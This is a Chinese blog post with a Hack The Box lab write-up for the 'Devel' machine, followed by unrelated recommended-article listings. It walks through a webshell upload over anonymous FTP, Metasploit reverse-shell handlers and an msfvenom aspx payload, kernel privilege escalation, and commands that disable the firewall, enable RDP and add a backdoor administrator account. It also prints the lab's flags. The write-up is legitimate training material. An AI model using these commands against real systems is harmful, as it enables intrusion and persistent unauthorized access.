Devel-10.10.10.5

最新推荐文章于 2023-06-23 18:17:43 发布
最新推荐文章于 2023-06-23 18:17:43 发布
阅读量125 收藏
点赞数
文章标签: HTB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38895262/article/details/102745015
版权

本次所使用的工具
nmap(zenmap)、remmina、冰蝎、FileZila(连接ftp的图形界面工具)

Devel - 10.10.10.5
2019年9月5日 11:02:45

1. 信息收集

nmap -T4 -A -v 10.10.10.5


开放21和80端口。
80端口访问后未IIS 7.5默认页面。

2. 获取Webshell

FTP存在匿名访问,FTP根目录为IIS的Web页面根目录。
使用FileZilla连接FTP后,上传冰蝎的Webshell到IIS路径下。


冰蝎客户端连接成功,查看当前用户,用户为web。

3.提权

用户为普通账号权限,无法进行账号添加及查看管理员文件的权限,尝试提权操作。这里使用MSF尝试进行提权。
开启MSF监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.16.66

冰蝎客户端i填写IP和端口,进行连接

MSF成功获取反弹Shell。

使用local_exploit_suggester模块获取提权建议

#将当前会话放入后台
background

use post/multi/recon/local_exploit_suggester
set session 1
set showdescription true
run

执行后获得多个提权建议,尝试使用ms10_015_kitrap0d

use exploit/windows/local/ms10_015_kitrap0d
set session 1
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.16.66
run

执行成功后,得到SYSTEM权限。
在这里插入图片描述

4.开启远程桌面

修改注册表,开启远程桌面

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

关闭防火墙

NetSh Advfirewall set allprofiles state off

添加管理员用户

net user hacker P@ssw0rd /add
net localgroup Administrators hacker /add

远程桌面开启成功
在这里插入图片描述

5. 登陆远程桌面,查找flag

先再资源管理器点击下Administrator等账号的文件夹,获取访问权限。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LFfiP2z2-1571990974453)(_v_images/20190918110943311_23442.png)]

6. flag

root:e621a0b5041708797c4fc4728bc72b4b
user:9ecdd6a3aedf24b41562fea70f4cb3e8

7. MSF生成Webshell

生成一个aspx格式的Webshell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.66 LPORT=4444 -f aspx > shell.aspx

生成的文件上传到服务器,开启MSF进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.16.66
run

浏览器访问http://10.10.10.5/shell.aspx,触发反弹shell,msfconsole成功获取到会话。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hL6fBkln-1571990974453)(_v_images/20190918111024614_28061.png)]

miu-miu-milk
关注
hackthebox-Devel (考点:ftp/IIS/windows)不用msf
冬萍子癸水
04-09 394
用msf做很快,很多人做这台机器写writeup也是用msf做的。但针对oscp,本篇文章不用msf nmap 看到21ftp要想到进去看看,找敏感文件 匿名anonymous进入 也没啥。但是你也有可能看到一些shell已经在里面了,那是因为之前有人做的留下的。开启机器,不一定会全部重置,会有前人的痕迹。我发现是这样。 可以看到IIS的图片。 再看80 扫描,没什么发现 打开80网页10.1...
自动化运维-Ansible(redhat 8)
system_rookie的大佬成长之路
08-27 3390
在控制节点安装Ansible redhat 8自带python 3;如果没有安装,需要自行安装 查看是否安装python3 [root@localhost ~]# yum list installed|grep platform-python 模块依赖问题 问题 1: conflicting requests - nothing provides module(perl:5.26) needed by module perl-DBD-SQLite:1.58:8010020190322125518
在Linux中源码安装MariaDB
weixin_43268590的博客
08-15 2342
在公网IP为x.x.x.x,安装CentOS8(Alibaba Cloud Linux 3.2104 LTS 64位)系统的服务器上进行源码安装mariadb-10.5.16。
centos6安装mariadb10全过程
He_GMk6 的博客
05-15 1228
centos6安装mariadb10全过程 2017年07月04日 19:56:35 阅读数:2124 问题 centos直接安装mariadb会遇到众多问题。如果直接安装mysql, 由于oracle官方维护不够给力,使用起来有一定的风险,所以必须要安装mariadb。如果用yum安装(在阿里云亲测),由于网络不好,下载安装包的过程中,总是容易中断。如果用源码安装,先要求装gnutls,...
HTB-Devel
qq_53142368的博客
07-01 399
htb-devel
CentOS环境下,因为与MariaDB发生冲突,导致MySQL安装失败的解决方法
weixin_55580258的博客
06-23 1048
MariaDB数据库管理系统是MySQL的一个分支,主要由开源社区在维护,采用GPL授权许可。开发这个分支的原因之一是:甲骨文公司收购了MySQL后,有将MySQL闭源的潜在风险,因此社区采用分支的方式来避开这个风险。MariaDB的目的是完全兼容MySQL,包括API和命令行,使之能轻松成为MySQL的代替品。然后强制卸载(如果其他用户没有使用mariadb的情况下)3. 然后重新安装下载的mysql安装包,即可安装成功。2. 查看并卸载之前遗留的MySQL安装包。
【Hack The Box】windows练习-- devel
人间体佐菲的博客
10-28 1157
【Hack The Box】windows练习-- devel
Linux常用命令
weixin_48354861的博客
07-30 1771
目录   一、基本命令 1.1 关机和重启 1.2 帮助命令 二、目录操作命令 2.1 目录切换 cd 2.2 目录查看 ls [-al] 2.3 目录操作【增,删,改,查】 2.3.1 创建目录【增】 mkdir 2.3.2 删除目录或文件【删】rm 2.3.3 目录修改【改】mv 和 cp 2.3.4 搜索目录【查】find 三、文件操...
Hackthebox:Devel Walkthrough
汗的博客
12-05 374
预备知识 ftp anonymous登录、任意文件上传、msfvenom生成webshell、meterpreter后渗透 信息收集 nmap 探测一下开放端口和服务 nmap 10.10.10.5 结果如下 Nmap scan report for 10.10.10.5 Host is up (0.34s latency). Not shown: 998 filtered ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http Nmap
HTB Devel[Hack The Box HTB靶场]writeup系列3
重新启程
02-01 2714
Retired Machines的第三台机器Devel 目录 0x00 靶机情况 0x01 端口扫描 0x02 ftp服务 0x03 上传payload 0x04 get webshell 0x05 提权 0x00 靶机情况 从靶机的情况来看,难度属于初级,基本上都是选择1、2、3分为主,操作系统是windows 0x01 端口扫描 看看靶机提供了哪些服务: roo...
hive 的基础学习
m0_45509427的博客
08-26 307
数据仓库-Hive 1. 数据仓库 1.1. 基本概念 英文名称为Data Warehouse,可简写为DW或DWH。数据仓库的目的是构建面向分析的集成化数据环境,为企业提供决策支持(Decision Support)。 数据仓库是存数据的,企业的各种数据往里面存,主要目的是为了分析有效数据,后续会基于它产出供分析挖掘的数据,或者数据应用需要的数据,如企业的分析性报告和各类报表等。 可以理解为:面...
apache-tomcat-8.5.98-windows-x64.zip
09-27
apache-tomcat-8.5.98-windows-x64.zip
基于Springboot和Vue的疫情管理系统源码 疫情管理系统代码(程序,中文注释)
09-27
疫情管理系统-疫情管理系统-疫情管理系统-疫情管理系统-疫情管理系统-疫情管理系统-疫情管理系统-疫情管理系统-疫情管理系统-疫情管理系统-疫情管理系统-疫情管理系统 1、资源说明:疫情管理系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、MVC ⑤ 开发环境:IDE
暴风电视刷机数据 40X 机编600000MW303 600000MWG03 风UI1.0升风UI3.0 强制升级
09-27
务必确认机身编号与文件名机编一致,如不一致,请勿下载 机身编号一般在机子背面的贴纸上 MSD6A338平台升级步骤 强制升级(不开机强制升级): 1、下载数据,压缩包解压,将BFTVUpdate338.bin拷贝至U盘根目录下,插入电视USB端口 2、插拔下电源,按一下遥控器待机键后快速不停的点按遥控器上键触发主板识别U盘软件进行升级 3、升级成功需运行至100%,此时耐心等待电视自动操作,切勿断电或拔掉U盘 4、系统升级后第一次重启系统需要3分钟左右,属于正常现象,切勿断电 升级完成后可以在系统设置——本机信息——查询软件版本更新状态 注意: 1、U盘要求使用FAT32格式,建议4G-8G的品牌U盘,刷机成功率会高 2、升级到结束,大约需要8-30分钟,中途绝对不能断电 3、升级重启第一次进入系统,请等完全正常进入开机桌面之后,才能拨下U盘
全球3D透明膜包装机行业总体规模、主要企业国内外市场占有率及排名(2024版).docx
09-27
全球3D透明膜包装机行业总体规模、主要企业国内外市场占有率及排名(2024版).docx
quickai-2.0.0-py3-none-any.whl
最新发布
09-27
quickai-2.0.0-py3-none-any.whl
周边游平台个人管理代码系统 Springboot周边游平台个人管理(程序,中文注释)
09-27
周边游平台个人管理-周边游平台个人管理-周边游平台个人管理-周边游平台个人管理-周边游平台个人管理-周边游平台个人管理-周边游平台个人管理-周边游平台个人管理-周边游平台个人管理-周边游平台个人管理-周边游平台个人管理-周边游平台个人管理 1、资源说明:周边游平台个人管理源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java
全球5G电缆组件行业总体规模、主要企业国内外市场占有率及排名(2024版).docx
09-27
全球5G电缆组件行业总体规模、主要企业国内外市场占有率及排名(2024版).docx
libaio-devel-0.3.105
07-30
libaio-devel-0.3.105 是Linux环境中的异步I/O库的开发包。异步I/O(Asynchronous I/O)是一种处理I/O操作的方法,它可以在进行I/O的同时执行其他操作,提高了系统的性能和效率。 libaio(Linux Async I/O)是Linux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值